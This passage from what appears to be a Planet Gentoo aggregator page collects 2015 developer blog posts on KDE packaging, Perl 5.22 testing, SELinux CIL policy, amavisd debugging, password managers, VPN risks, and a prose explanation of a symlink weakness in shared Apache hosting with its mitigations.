  • Find a way to truly create a “core” part of the policy and a modular/serviceable approach to handle additional policies. The idea of the contrib/ repository was like that, but failed to live up to its expectations: the number of people who have commit access to the contrib is almost the same as to the core, a few exceptions notwithstanding, and whenever policies are added to contrib they often require changes on the core as well. Perhaps even support overlay-type approaches to policies so that intermediate policies can be “staged” and tested by a larger audience before they are vetted into the upstream reference policy.
  • Settle on how to deal with networking controls. My suggestion would be to immediately support the TCP/UDP ports as assigned by IANA (or another set of sources) so that additional policies do not need to wait for the base policy to support the ports. Or find and support a way for contributions to declare the port types themselves (we probably need to focus on CIL for this).
  • Document “best practices” on policy development where certain types of policies are documented in more detail. For instance, desktop application profiles, networked daemons, user roles, etc. These best practices should not be mandatory and should in fact support a broad set of privilege isolation. With the latter, I mean that there are policies who cover an entire category of systems (init systems, web servers), a single software package or even the sub-commands and sub-daemons of that package. It would surprise me if this can’t be supported better out-of-the-box (as in, through a well thought-through base policy framework and styleguide).

I believe that this might create a more active community surrounding policy development.

July 03, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
KDEPIM without Akonadi (July 03, 2015, 14:16 UTC)

As you know, Gentoo is all about flexibility. You can run bleeding edge code (portage, our package manager, even provides you with installation from git master KF5 and friends) or you can focus on stability and trusted code. This is why we've been offering our users for the last years KDEPIM 4.4.11.1 (the version where KMail e-mail storage was not integrated with Akonadi yet, also known as KMail1) as a drop-in replacement for the newer versions.
Recently the Nepomuk search framework has been replaced by Baloo, and after some discussion we decided that for the Nepomuk-related packages it's now time to go. Problem is, the old KDEPIM packages still depend on it via their Akonadi version. This is why - for those of our users who prefer to run KDEPIM 4.4 / KMail1 - we've decided to switch to Pali Rohár's kdepim-noakonadi fork (see also his 2013 blog post and the code).The packages are right now in the KDE overlay, but will move to the main tree after a few days of testing and be treated as an update of KDEPIM 4.4.11.1.
The fork is essentially KDEPIM 4.4 including some additional bugfixes from the KDE/4.4 git branch, with KAddressbook patched back to KDEPIM 4.3 state and references to Akonadi removed elsewhere. This is in some ways a functionality regression since the integration of e.g. different calendar types is lost, however in that version it never really worked perfectly anyway.

For now, you will still need the akonadi-server package, since kdepimlibs (outside kdepim and now at version 4.14.9) requires it to build, but you'll never need to start the Akonadi server. As a consequence, Nepomuk support can be disabled everywhere, and the Nepomuk core and client and Akonadi client packages can be removed by the package manager (--depclean, make sure to first globally disable the nepomuk useflag and rebuild accordingly).

You might ask "Why are you still doing this?"... well. I've been told Akonadi and Baloo is working very nicely, and again I've considered upgrading all my installations... but then on my work desktop where I am using newest and greatest KDE4PIM bug 338658 pops up regularly and stops syncing of important folders. I just don't have the time to pointlessly dig deep into the Akonadi database every few days. So KMail1 it is, and I'll rather spend some time occasionally picking and backporting bugfixes.

June 27, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
LastPass got hacked, I'm still okay with it (June 27, 2015, 13:23 UTC)

So LastPass was compromised and so they report. I'm sure there are plenty of smug geeks out there, happy about users being compromised. I thought that this is the right time to remind people why I'm a LastPass user and will stay a LastPass user even after this.

The first part is a matter of trust in the technology. If I did not trust LastPass enough to not have easy access to the decrypted content, I wouldn't be using it to begin with. Since I do not trust the LastPass operators, even in the case the encrypted vault were compromised (and they say they weren't), I wouldn't be worrying too much.

On the other hand I followed the obvious course of not only changing the master password, and change the important passwords just to be paranoid. This is actually one good side of LastPass — changing the passwords that are really important is very easy as they instrument the browser, so Facebook, Twitter, Amazon, PayPal, … are one click away from a new, strong password.

Once again, the main reason why I suggest tools such as LastPass (and I like LastPass, but that's just preference) is that they are easy to use, and easy to use means people will use them. Making tools that are perfectly secure in theory but very hard to use just means people will not use them, full stop. A client-side certificate is much more secure than a password, but at the same time procuring one and using it properly is non-trivial so in my experience only a handful of services use that — I know of a couple of banks in Italy, and of course StartSSL and similar providers.

The problem with offline services is that, for the most part, don't allow good access while from phones, for instance. So you end up choosing, for things you use often from the phone, memorable passwords. But memorable passwords are usually fairly easy to crack, unless you use known methods and long password — although at least it's not the case, like I read on Arse^H recently, that since we know the md5 hash for "mom", any password with that string anywhere is weakened.

Let's take an example away from the password vaults. In Ireland (and I assume UK simply because the local systems are essentially the same in many aspects), banks have this bollocks idea that is more secure to ask for some of the characters of a password rather than a full password. I think this is a remnant of old bank teller protocols, as I remember reading about that in The Art of Deception (good read, by the way.)

While in theory picking a random part of the password means a phishing attempt would never get the full password, and thus won't be able to access the bank's website unless they are very lucky and get exactly the same three indexes over and over, it is a frustrating experience.

My first bank, AIB, used a five-digits PIN, and then select three digits out of it when I log in, which is not really too difficult to memorize. On the other hand, on their mobile app they decided that the right way to enter the numbers is by using drop-down boxes (sigh.) My current bank, Ulster Bank/RBS, uses a four digits pin, plus a variable length password, which I generated through LastPass as 20 characters, before realizing how bad that is, because it means I now get asked three random digits off the four... and three random characters of the 20.

Let that sink in a moment: they'll ask me for the second, fifth and sixteenth character of a twenty characters randomly generated password. So no auto-fill, no copy-paste, no password management software assisted login. Of course most people here would just not bother and go with a simple password they can remember. Probably made of multiple words of the same length (four letters? five?) so that it becomes easy to count which one is the first character of the fourth word (sixteenth character of the password.) Is it any more secure?

I think I'll write a separate blog post about banks apps and website security mis-practices because it's going to be a long topic and one I want to write down properly so I can forward it to my bank contacts, even though it won't help with anything.

Once again, my opinion is that any time you make security a complicated feature, you're actually worsening the practical security, even if your ideas are supposed to improve the theoretical one. And that includes insisting on the perfect solution for password storage.

June 26, 2015
Mike Pagano a.k.a. mpagano (homepage, bugs)
kdbus in gentoo-sources (June 26, 2015, 23:35 UTC)

 

Keeping with the theme of ‘Gentoo is about choice” I’ve added the ability for users to include kdbus into their gentoo-sources kernel.  I wanted an easy way for gentoo users to test the patchset while maintaining the default installation of not having it at all.

In order to include the patchset on your gentoo-sources you’ll need the following:

1. A kernel version >= 4.1.0-r1

2. the ‘experimental’ use flag

3. the ‘kdbus’ use flag

I am not a systemd user, but from the ebuild it looks like if you build systemd with the ‘kdbus’ use flag it will use it.

Please send all kdbus bugs upstream by emailing the developers and including linux-kernel@vger.kernel.org in the CC .

Read as much as you can about kdbus before you decided to build it into your kernel.  There have been security concerns mentioned (warranted or not), so following the upstream patch review at lkml.org would probably be prudent.

When a new version is released, wait a week before opening a bug.  Unless I am on vacation, I will most likely have it included before the week is out. Thanks!

NOTE: This is not some kind of Gentoo endorsement of kdbus.  Nor is it a Mike Pagano endorsement of kdbus.  This is no different then some of the other optional and experimental patches we carry.  I do all the genpatches work which includes the patches, the ebuilds and the bugs therefore since I don’t mind the extra work of keeping this up to date, then I can’t see any reason not to include it as an option.

 

 

June 25, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
KDE Plasma 5.3.1 testing (June 25, 2015, 23:15 UTC)

After several month of packaging in kde overlay and almost a month in tree, we have lifted the mask for KDE Plasma 5.3.1 today. If you want to test it out, now some infos how to get it.

For easy transition we provide two new profiles, one for OpenRC and the other for systemd.

root # eselect profile list
...
[8] default/linux/amd64/13.0/desktop/plasma
[9] default/linux/amd64/13.0/desktop/plasma/systemd
...

Following example activates the Plasma systemd profile:

root # eselect profile set 9

On stable systems you need to unmask the qt5 use flag:

root # echo "-qt5" >> /etc/portage/profile/use.stable.mask

Any packages affected by the profile change need to be rebuilt:

root # emerge -avuND @world

For stable users, you also need to keyword the required packages. You can let portage handle it with autokeyword feature or just grep the keyword files for KDE Frameworks 5.11 and KDE Plasma 5.3.1 from kde overlay.

Now just install it (this is full Plasma 5, the basic desktop would be kde-plasma/plasma-desktop):

root # emerge -av kde-plasma/plasma-meta

KDM is not supported for Plasma 5 anymore, so if you have installed it kill it with fire. Possible and tested login managers are SDDM and LightDM.

For detailed instructions read the full upgrade guide. Package bugs can be filed to bugs.gentoo.org and about the software to bugs.kde.org.

Have fun,
the Gentoo KDE Team

June 23, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

tl;dr Most servers running a multi-user webhosting setup with Apache HTTPD probably have a security problem. Unless you're using Grsecurity there is no easy fix.

I am part of a small webhosting business that I run as a side project since quite a while. We offer customers user accounts on our servers running Gentoo Linux and webspace with the typical Apache/PHP/MySQL combination. We recently became aware of a security problem regarding Symlinks. I wanted to share this, because I was appalled by the fact that there was no obvious solution.

Apache has an option FollowSymLinks which basically does what it says. If a symlink in a webroot is accessed the webserver will follow it. In a multi-user setup this is a security problem. Here's why: If I know that another user on the same system is running a typical web application - let's say Wordpress - I can create a symlink to his config file (for Wordpress that's wp-config.php). I can't see this file with my own user account. But the webserver can see it, so I can access it with the browser over my own webpage. As I'm usually allowed to disable PHP I'm able to prevent the server from interpreting the file, so I can read the other user's database credentials. The webserver needs to be able to see all files, therefore this works. While PHP and CGI scripts usually run with user's rights (at least if the server is properly configured) the files are still read by the webserver. For this to work I need to guess the path and name of the file I want to read, but that's often trivial. In our case we have default paths in the form /home/[username]/websites/[hostname]/htdocs where webpages are located.

So the obvious solution one might think about is to disable the FollowSymLinks option and forbid users to set it themselves. However symlinks in web applications are pretty common and many will break if you do that. It's not feasible for a common webhosting server.

Apache supports another Option called SymLinksIfOwnerMatch. It's also pretty self-explanatory, it will only follow symlinks if they belong to the same user. That sounds like it solves our problem. However there are two catches: First of all the Apache documentation itself says that "this option should not be considered a security restriction". It is still vulnerable to race conditions.

But even leaving the race condition aside it doesn't really work. Web applications using symlinks will usually try to set FollowSymLinks in their .htaccess file. An example is Drupal which by default comes with such an .htaccess file. If you forbid users to set FollowSymLinks then the option won't be just ignored, the whole webpage won't run and will just return an error 500. What you could do is changing the FollowSymLinks option in the .htaccess manually to SymlinksIfOwnerMatch. While this may be feasible in some cases, if you consider that you have a lot of users you don't want to explain to all of them that in case they want to install some common web application they have to manually edit some file they don't understand. (There's a bug report for Drupal asking to change FollowSymLinks to SymlinksIfOwnerMatch, but it's been ignored since several years.)

So using SymLinksIfOwnerMatch is neither secure nor really feasible. The documentation for Cpanel discusses several possible solutions. The recommended solutions require proprietary modules. None of the proposed fixes work with a plain Apache setup, which I think is a pretty dismal situation. The most common web server has a severe security weakness in a very common situation and no usable solution for it.

The one solution that we chose is a feature of Grsecurity. Grsecurity is a Linux kernel patch that greatly enhances security and we've been very happy with it in the past. There are a lot of reasons to use this patch, I'm often impressed that local root exploits very often don't work on a Grsecurity system.

Grsecurity has an option like SymlinksIfOwnerMatch (CONFIG_GRKERNSEC_SYMLINKOWN) that operates on the kernel level. You can define a certain user group (which in our case is the "apache" group) for which this option will be enabled. For us this was the best solution, as it required very little change.

I haven't checked this, but I'm pretty sure that we were not alone with this problem. I'd guess that a lot of shared web hosting companies are vulnerable to this problem.

Here's the German blog post on our webpage and here's the original blogpost from an administrator at Uberspace (also German) which made us aware of this issue.

June 21, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Perl 5.22 testers needed! (June 21, 2015, 08:14 UTC)

Gentoo users rejoice, for a few days already we have Perl 5.22.0 packaged in the main tree. Since we don't know yet how much stuff will break because of the update, it is masked for now. Which means, we need daring testers (preferably running ~arch systems, stable is also fine but may need more work on your part to get things running) who unmask the new Perl, upgrade, and file bugs if needed!!!
Here's what you need in /etc/portage/package.unmask (and possibly package.accept_keywords) to get started (download); please always use the full block, since partial unmasking will lead to chaos. We're looking forward to your feedback!
# Perl 5.22.0 mask / unmask block
=dev-lang/perl-5.22.0
=virtual/perl-Archive-Tar-2.40.0
=virtual/perl-Attribute-Handlers-0.970.0
=virtual/perl-B-Debug-1.230.0
=virtual/perl-CPAN-2.110.0
=virtual/perl-CPAN-Meta-2.150.1
=virtual/perl-CPAN-Meta-Requirements-2.132.0
=virtual/perl-Carp-1.360.0
=virtual/perl-Compress-Raw-Bzip2-2.68.0
=virtual/perl-Compress-Raw-Zlib-2.68.0
=virtual/perl-DB_File-1.835.0
=virtual/perl-Data-Dumper-2.158.0
=virtual/perl-Devel-PPPort-3.310.0
=virtual/perl-Digest-MD5-2.540.0
=virtual/perl-Digest-SHA-5.950.0
=virtual/perl-Exporter-5.720.0
=virtual/perl-ExtUtils-CBuilder-0.280.221
=virtual/perl-ExtUtils-Command-1.200.0
=virtual/perl-ExtUtils-Install-2.40.0
=virtual/perl-ExtUtils-MakeMaker-7.40.100_rc
=virtual/perl-ExtUtils-ParseXS-3.280.0
=virtual/perl-File-Spec-3.560.0
=virtual/perl-Filter-Simple-0.920.0
=virtual/perl-Getopt-Long-2.450.0
=virtual/perl-HTTP-Tiny-0.54.0
=virtual/perl-IO-1.350.0
=virtual/perl-IO-Compress-2.68.0
=virtual/perl-IO-Socket-IP-0.370.0
=virtual/perl-JSON-PP-2.273.0
=virtual/perl-Locale-Maketext-1.260.0
=virtual/perl-MIME-Base64-3.150.0
=virtual/perl-Math-BigInt-1.999.700
=virtual/perl-Math-BigRat-0.260.800
=virtual/perl-Module-Load-Conditional-0.640.0
=virtual/perl-Module-Metadata-1.0.26
=virtual/perl-Perl-OSType-1.8.0
=virtual/perl-Pod-Escapes-1.70.0
=virtual/perl-Pod-Parser-1.630.0
=virtual/perl-Pod-Simple-3.290.0
=virtual/perl-Safe-2.390.0
=virtual/perl-Scalar-List-Utils-1.410.0
=virtual/perl-Socket-2.18.0
=virtual/perl-Storable-2.530.0
=virtual/perl-Term-ANSIColor-4.30.0
=virtual/perl-Term-ReadLine-1.150.0
=virtual/perl-Test-Harness-3.350.0
=virtual/perl-Test-Simple-1.1.14
=virtual/perl-Text-Balanced-2.30.0
=virtual/perl-Text-ParseWords-3.300.0
=virtual/perl-Time-Piece-1.290.0
=virtual/perl-Unicode-Collate-1.120.0
=virtual/perl-XSLoader-0.200.0
=virtual/perl-autodie-2.260.0
=virtual/perl-bignum-0.390.0
=virtual/perl-if-0.60.400
=virtual/perl-libnet-3.50.0
=virtual/perl-parent-0.232.0
=virtual/perl-threads-2.10.0
=virtual/perl-threads-shared-1.480.0
=dev-perl/Test-Tester-0.114.0
=dev-perl/Test-use-ok-0.160.0

# end of the Perl 5.22.0 mask / unmask block
After the update, first run
emerge --depclean --ask
and afterwards
perl-cleaner --all
perl-cleaner should not need to do anything, ideally. If you have depcleaned first and it still wants to rebuild something, that's a bug. Please file a bug report for the package that is getting rebuilt (but check our wiki page on known Perl 5.22 issues first to avoid duplicates).


June 20, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Hallo!

Von Krautreporter hatte ich parallel über meinen Bruder und durch die “Jung & Naiv” Videos von Tilo Jung erfahren.
Mit meiner Mitgliederschaft als Leser bin ich sehr zufrieden: Viele Extras habe ich nicht genutzt, aber doch hier und da in einen Mitglieder-only-Podcast (“Viertel vor Feierabend”) reingehört und auch die Gelegenheit genutzt, die Redaktion zum Jubiläum vor Ort etwas näher kennenzulernen.

Ich bin auf jeden Fall im zweiten Jahr dabei, nicht als Experiment sondern wegen der Artikel: viel Spannendes dabei. Spannend fand ich persönlich zum Beispiel konkret

und von Theresa Bäuerlein hab ich noch mehrere Bookmarks mit Artikeln, für die ich mir noch Zeit nehmen werde.

Ich hoffe sehr, dass Krautreporter weiter bestehen kann. Vielleicht ist echter Journalismus ohne Werbung ja auch was für dich? Mehr Details gibt’s hier:

June 19, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Important!

My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

Recently, I wrote an article about amavisd not running with Postfix, and getting a “Connection refused to 127.0.0.1″ error message that wasn’t easy to diagnose. Yesterday, I ran into another problem with amavisd refusing to start properly, and I wasn’t readily able to figure out why. By default, amavisd logs to your mail log, which for me is located at /var/log/mail.log, but could be different for you based on your syslogger preferences. The thing is, though, that it will not log start-up errors there. So basically, one is seemingly left in the dark if you start amavisd and then realise it isn’t running immediately thereafter.

I decided to take a look at the init script for amavisd, and saw that there were some non-standard functions in it:


# grep 'extra_commands' /etc/init.d/amavisd
extra_commands="debug debug_sa"

These extra commands map to the following functions:


debug() {
ebegin "Starting ${progname} in debug mode"
"${prog}" debug
eend $?
}

debug_sa() {
ebegin "Starting ${progname} in debug-sa mode"
"${prog}" debug-sa
eend $?
}

Though these extra commands may be Gentoo-specific, they are pretty easy to implement on other distributions by directly calling the binary itself. For instance, if you wanted the debug function, it would be the location of the binary with ‘debug’ appended to it. On my system, that would be:


/usr/sbin/amavisd -c $LOCATION_OF_CONFIG_FILE debug

replacing the $LOCATION_OF_CONFIG_FILE with your actual config file location.

When I started amavisd in debug mode, the start-up problem that it was having became readily apparent:


# /etc/init.d/amavisd debug
* Starting amavisd-new in debug mode ...
Jun 18 12:48:21.948 /usr/sbin/amavisd[4327]: logging initialized, log level 5, syslog: amavis.mail
Jun 18 12:48:21.948 /usr/sbin/amavisd[4327]: starting. /usr/sbin/amavisd at amavisd-new-2.10.1 (20141025), Unicode aware, LANG="en_GB.UTF-8"

Jun 18 12:48:22.200 /usr/sbin/amavisd[4327]: Net::Server: 2015/06/18-12:48:22 Amavis (type Net::Server::PreForkSimple) starting! pid(4327)
Jun 18 12:48:22.200 /usr/sbin/amavisd[4327]: (!)Net::Server: 2015/06/18-12:48:22 Unresolveable host [::1]:10024 - could not load IO::Socket::INET6: Can't locate Socket6.pm in @INC (you may need to install the Socket6 module) (@INC contains: lib /etc/perl /usr/local/lib64/perl5/5.20.2/x86_64-linux /usr/local/lib64/perl5/5.20.2 /usr/lib64/perl5/vendor_perl/5.20.2/x86_64-linux /usr/lib64/perl5/vendor_perl/5.20.2 /usr/local/lib64/perl5 /usr/lib64/perl5/vendor_perl/5.20.1/x86_64-linux /usr/lib64/perl5/vendor_perl/5.20.1 /usr/lib64/perl5/vendor_perl /usr/lib64/perl5/5.20.2/x86_64-linux /usr/lib64/perl5/5.20.2) at /usr/lib64/perl5/vendor_perl/5.20.1/Net/Server/Proto.pm line 122.\n\n at line 82 in file /usr/lib64/perl5/vendor_perl/5.20.1/Net/Server/Proto.pm
Jun 18 12:48:22.200 /usr/sbin/amavisd[4327]: Net::Server: 2015/06/18-12:48:22 Server closing!

In that code block, the actual error (in bold text) indicates that it couldn’t find the Perl module IO:Socket::INET6. This problem was easily fixed in Gentoo with emerge -av dev-perl/IO-Socket-INET6, but could be rectified by installing the module from your distribution’s repositories, or by using CPAN. In my case, it was caused by my recent compilation and installation of a new kernel that, this time, included IPV6 support.

The point of my post, however, wasn’t about my particular problem with amavisd starting, but rather how one can debug start-up problems with the daemon. Hopefully, if you run into woes with amavisd logging, these debug options will help you track down the problem.

Cheers,
Zach

June 14, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
European Xiangqi stickers (Chinese chess) (June 14, 2015, 21:58 UTC)

Hello!

For quite a while I have been looking for someone to design european piece graphics for Xiangqi (Chinese chess) without luck. Early this March I was pointed to Jasmin Scharrer fortunately!

The pieces she designed allowed making sheets of stickers to help kickstart the learning experience of people new to the game, facing Chinese-only gaming hardware: You put stickers on the backside of the pieces and turn them over whenever you are ready to: only some and then some more, all at once, your choice.

This is the stickers on real hardware:

The full sticker sheet takes an A4 page and looks like this:

To print your own, you should use the vector version for quality.

Since we picked CC-BY-4.0 for a license, you could even sell your prints as long as proper attribution to

Jasmin Scharrer (original artwork, http://jasminscharrer.com/),
Sebastian Pipping (post-processing, https://blog.hartwork.org/)

for the initial source is done.

Using the same piece graphics, xiangqi-setup also has a piece theme “euro_xiangqi_js” now. With that, you can render European setup images like this one:

$ xiangqi-setup --pieces euro_xiangqi_js --width-cm 7 doc/demo.wxf \
      output.svg

If you need help with any of this or for feedback in general, please feel free to contact me at sebastian@pipping.org. Best, Sebastian

June 13, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Where does CIL play in the SELinux system? (June 13, 2015, 21:12 UTC)

SELinux policy developers already have a number of file formats to work with. Currently, policy code is written in a set of three files:

  • The .te file contains the SELinux policy code (type enforcement rules)
  • The .if file contains functions which turn a set of arguments into blocks of SELinux policy code (interfaces). These functions are called by other interface files or type enforcement files
  • The .fc file contains mappings of file path expressions towards labels (file contexts)

These files are compiled into loadable modules (or a base module) which are then transformed to an active policy. But this is not a single-step approach.

Transforming policy code into policy file

For the Linux kernel SELinux subsystem, only a single file matters – the policy.## file (for instance policy.29). The suffix denotes the binary format used as higher numbers mean that additional SELinux features are supported which require different binary formats for the SELinux code in the Linux kernel.

With the 2.4 userspace, the transformation of the initial files as mentioned above towards a policy file is done as follows:

When a developer builds a policy module, first checkmodule is used to build a .mod intermediate file. This file contains the type enforcement rules with the expanded rules of the various interface files. Next, semodule_package is called which transforms this intermediate file, together with the file context file, into a .pp file.

This .pp file is, in the 2.4 userspace, called a “high level language” file. There is little high-level about it, but the idea is that such high-level language files are then transformed into .cil files (CIL stands for Common Intermediate Language). If at any moment other frameworks come around, they could create high-level languages themselves and provide a transformation engine to convert these HLL files into CIL files.

For the current .pp files, this transformation is supported through the /usr/libexec/selinux/hll/pp binary which, given a .pp file, outputs CIL code.

Finally, all CIL files (together) are compiled into a binary policy.29 file. All the steps coming from a .pp file towards the final binary file are handled by the semodule command. For instance, if an administrator loads an additional .pp file, its (generated) CIL code is added to the other active CIL code and together, a new policy binary file is created.

Adding some CIL code

The SELinux userspace development repository contains a secilc command which can compile CIL code into a binary policy file. As such, it can perform the (very) last step of the file conversions above. However, it is not integrated in the sense that, if additional code is added, the administrator can “play” with it as he would with SELinux policy modules.

Still, that shouldn’t prohibit us from playing around with it to experiment with the CIL language construct. Consider the following CIL SELinux policy code:

; Declare a test_port_t type
(type test_port_t)
; Assign the type to the object_r role
(roletype object_r test_port_t)

; Assign the right set of attributes to the port
(typeattributeset defined_port_type test_port_t)
(typeattributeset port_type test_port_t)

; Declare tcp:1440 as test_port_t
(portcon tcp 1440 (system_u object_r test_port_t ((s0) (s0))))

The code declares a port type (test_port_t) and uses it for the TCP port 1440.

In order to use this code, we have to build a policy file which includes all currently active CIL code, together with the test code:

~$ secilc -c 29 /var/lib/selinux/mcs/active/modules/400/*/cil testport.cil

The result is a policy.29 (the command forces version 29 as the current Linux kernel used on this system does not support version 30) file, which can now be copied to /etc/selinux/mcs/policy. Then, after having copied the file, load the new policy file using load_policy.

And lo and behold, the port type is now available:

~# semanage port -l | grep 1440
test_port_t           tcp      1440

To verify that it really is available and not just parsed by the userspace, let’s connect to it and hope for a nice denial message:

~$ ssh -p 1440 localhost
ssh: connect to host localhost port 1440: Permission denied

~$ sudo ausearch -ts recent
time->Thu Jun 11 19:35:45 2015
type=PROCTITLE msg=audit(1434044145.829:296): proctitle=737368002D700031343430006C6F63616C686F7374
type=SOCKADDR msg=audit(1434044145.829:296): saddr=0A0005A0000000000000000000000000000000000000000100000000
type=SYSCALL msg=audit(1434044145.829:296): arch=c000003e syscall=42 success=no exit=-13 a0=3 a1=6d4d1ce050 a2=1c a3=0 items=0 ppid=2005 pid=18045 auid=1001 uid=1001 gid=1001 euid=1001 suid=1001 fsuid=1001 egid=1001 sgid=1001 fsgid=1001 tty=pts0 ses=1 comm="ssh" exe="/usr/bin/ssh" subj=staff_u:staff_r:ssh_t:s0 key=(null)
type=AVC msg=audit(1434044145.829:296): avc:  denied  { name_connect } for  pid=18045 comm="ssh" dest=1440 scontext=staff_u:staff_r:ssh_t:s0 tcontext=system_u:object_r:test_port_t:s0 tclass=tcp_socket permissive=0

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Artificial regions, real risks (June 13, 2015, 14:20 UTC)

In my last encounter with what I call "artificial regions" that I talked about, I was complaining about the problems with ping-ponging between US and Italy, and then moving to Dublin. Those first-world problems are now mostly (but not fully) solved and not really common, so I wouldn't call them "real" for most people.

What I have ignored in that series of posts was, though, the region-locking applied by Big Content providers, particularly in regards to movies, TV series, and so on. This was because it's a problem that is way too obvious already, and there isn't much that one can add to it at this point, it has been written about, illustrated and argued for years by now.

The reason why I'm going back to this now, though, is that there has recently been news of yet another scam, at the damage of the final consumers, connected to a common way to work around artificial region limitations. But first, let me point out the obvious first step: in this post I'm not talking about the out-and-out piracy option of downloading content straight from The Pirate Bay or anything along those lines. I'm instead going to focus on those people who either pay for a service, or wants to pay for content, but are blocked by the artificial region set up for content.

I'll use as my first example Comixology of which I'm a customer, because I like comics but I travel too much to bring them with me physically, and more importantly would just increase the amount of things I'd have to move with me if I decide to change place. Unlike many other content providers, Comixology uses multiple regional segregation approaches: your payment card billing address tells you which website you can use, which actually only changes how much you're paying; the IP you're coming from tells you which content you can buy. Luckily, they still let you access paid content even if your IP no longer match the one you can buy it from.

This is not really well documented, by the way. Some time ago they posted on their G+ page that they opened a deal with a manga distributor so that more content was available; I took the chance to buy a bunch of Bleach issues (but not all of them) as I have not finished watching the anime due to other issues in the past, and I wanted to catch up on my terms. But a few weeks later when I wanted to buy more because I finished the stash… I couldn't. I thought they broke off the deal, since there was no reference to it on the website or app, so I gave up… until they posted a sale, and I saw that they did list Bleach, but the link brought me to a "Page not Found" entry.

Turns out that they admitted on Twitter that due to the way the rights for the content go, they are not allowed to sell manga outside of the States, and even though they do validate my billing address (I use my American debit card there) they seem to ignore it and only care on where they think they are physically located at the moment. Which is kinda strange, given that it means you can buy manga from them if you've got an European account and just so happens to travel to the United States.

Admittedly, this is by far not something that only happens with this website. In particular, Google Play Movies used to behave this way, where you could buy content while abroad, but you would be stopped from downloading it (but if you had it downloaded, you could still play.) This was unlike Apple, that always tied its availability and behaviour on the country your iTunes account was tied to, verified by billing address of the connected payment card — or alternatively faked and paid with country-specific iTunes gift cards.

One "easy" way to work around this is to use VPN services to work around IP-based geographical restrictions. The original idea of a VPN is to connect multiple LANs, or a remote client to a LAN, in a secure way. While there is some truth about the security of this, lots of it is actually vapourware, due to so many technical hurdles of actually securing a LAN, that the current trend is to not rely on VPNs at all. But then again, VPNs allow you to change where your Internet egress is, which is handy.

A trustworthy VPN is actually a very useful tool, especially if what you're afraid of is sniffers of your traffic on public WiFi and similar, because now you're actually only talking with a single (or limited set of) points-of-presence (POP) with an encrypted protocol. The keyword here is trustworthy, as now instead of worrying of what people in your proximity could do with your non-encrypted traffic, you have to worry what the people who manage the VPN, or in proximity to the VPN provider, would do with that information.

Even more important, since VPNs are generally authenticated, an attacker that can control or infiltrate your VPN provider can easily tie together all your traffic, no matter where you're connecting from. This is possibly the sole thing for which Tor is a better option, as there isn't a single one manager for the VPN — although recent discussions may show that even Tor is not as safe from following a single user as some people kept promising or boasting.

These VPN services end up being advertised as either privacy tools, for the reasons just noted, or as tools against censorship. In the latter case the usual scare is the Great Firewall of China, without considering that there are very few websites that suffer what I'd define "censorship" on a country level — The Pirate Bay does not count, as much as I think it's silly and counterproductive to ban access to it, censorship is a word I'd reserve for much more venomous behaviour. Region-locking, on the other hand, as I've shown is pretty heavy, but just saying out loud that you work around region-locking is not really good for business, as it may well be against all terms of service that people say they accepted.

Here comes the bombshell for most people: yes, VPN services are (for the most part) not managed by angels who want all information in the world to be free. Such "heroes" are mostly created by popular culture and are much rarer than you would think. Painting them as such would be like painting MegaUpload and Kim Dotcom as generous saviours of humanity — which admittedly I've seen too many people, especially in the Free Software and privacy-conscious movements, doing.

VPN services are, for many people, quite profitable. Datacenter bandwidth is getting cheaper and cheaper, while end-user speeds are either capped, or easily capped by the VPN itself. If you make people pay for the service, it's not going to take that many users to pay for the bandwidth, and then start making profits. And many people are happy to pay for the service, either because it's still cheaper than accepting the geographical restrictions or because they go for the privacy candy.

On the other hand there are free VPN services out there, so what about them? I've been surprised before by self-defined privacy advocates suggesting to the masses to use free VPN services, while at the same time avoiding Dropbox, Microsoft and other offerings with the catchphrase «If you're not paying for it, you're the product.» Turns out for free VPN providers, you most definitely are a product.

To use the neologism I so much hate, it's always interesting to figure out how these providers monetize you, and that's not always easy because it may as well be completely passive: they could be siphoning data the same way I described in my previous post, and then use that to target you for more or less legal or ethical interests. Or they could be injecting referral codes when you browse websites with affiliate programs such as Amazon (similarly to how some Chrome extensions used to work, with the difference of being done at the router level) — this is, by the way, one extremely good reason to use HTTPS everywhere, as you can't do that kind of manipulation on protected pages without fiddling with the certificate.

Or, as it became apparent recently, they may be playing with your egress so that sure, you are now going to the Internet through some random US person's address, but at the same time, your address is being used for… something else. Which may be streaming a different version of Netflix – e.g.: the Big Bang Theory is available on French Netflix, but not in the US one – or they may be selling stolen credit card data, or browse for child porn, or whatever else they care to do.

What's the bottom line here? Well, it seems obvious that the current regime of rights that imposes region-locking of content is not only unlikely to be helping the content producers (rather than distributors) much – The Pirate Bay content never was region-locked – but it's also causing harm to people who would otherwise be happy to pay to be able to access it!

I'm not advocating for removing copyright, or that content should be free to all – I may prefer such a situation, but I don't think it's realistic – but I would pretty much like for these people to wake up and realize that if I'm ready to give them money, it would be a good thing for them to accept it without putting me at risk more than if I were not to give them money and just pirate the content.

And now go, and uninstall Hola, for universe's sake!

June 12, 2015

A while back I came across a fairly good article on the need for consciousness regarding children and computer. However I miss a few paragraphs (or even chapters) regarding necessary steps (even without children).

None of this is of course the childrens’ fault, however it does provide a good opportunity to discuss computer security hygiene, and with it the lack of knowledge and focus on security and privacy in current and new generations.

To start off, the article that inspired this post: Your Weakest Security Link? Your Children – WSJ

What do you do when the biggest threat to your cybersecurity lives under your own roof?

It’s a fact of life online: a network is only as strong as its weakest link. For many people, that weakest link is their children. They inadvertently download viruses. They work around security to visit sites their parents don’t want them to. They run up huge bills using their parents’ one-click ordering.

Segregated WiFi networks
My largest concern with the article is that it does not mention the need for a wifi guest network. You should never, ever, allow external devices outside your control, or lower security devices like tablets and smartphones directly onto your LAN, these devices simply doesn’t need it and should be in a separate security zone on the firewall, if you need access to local resources, use OpenVPN to set up a connection from wifi zone to lan zone, or for certain other elements open up specific ports/applications to pass through.

